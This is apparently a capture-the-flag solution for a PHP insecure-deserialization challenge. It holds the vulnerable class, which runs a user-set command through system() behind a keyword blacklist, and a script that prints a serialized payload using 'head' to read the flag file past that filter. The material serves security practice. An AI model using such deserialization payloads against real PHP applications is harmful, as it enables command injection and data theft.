- Output for 8.2.0 - 8.2.27, 8.3.0 - 8.3.15, 8.4.1 - 8.4.2
- O:4:"evil":1:{s:3:"cmd";s:35:"head /th1s_1s_fffflllll4444aaaggggg";}
<?php
//highlight_file(__FILE__);
// Maybe you need learn some knowledge about deserialize?
class evil {
public$cmd="head /th1s_1s_fffflllll4444aaaggggg";
// public function __destruct()
// {
// if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){
// @system($this->cmd);
// }
// }
}
$a=new evil();
echo serialize($a);
//@unserialize($_POST['unser']);
?>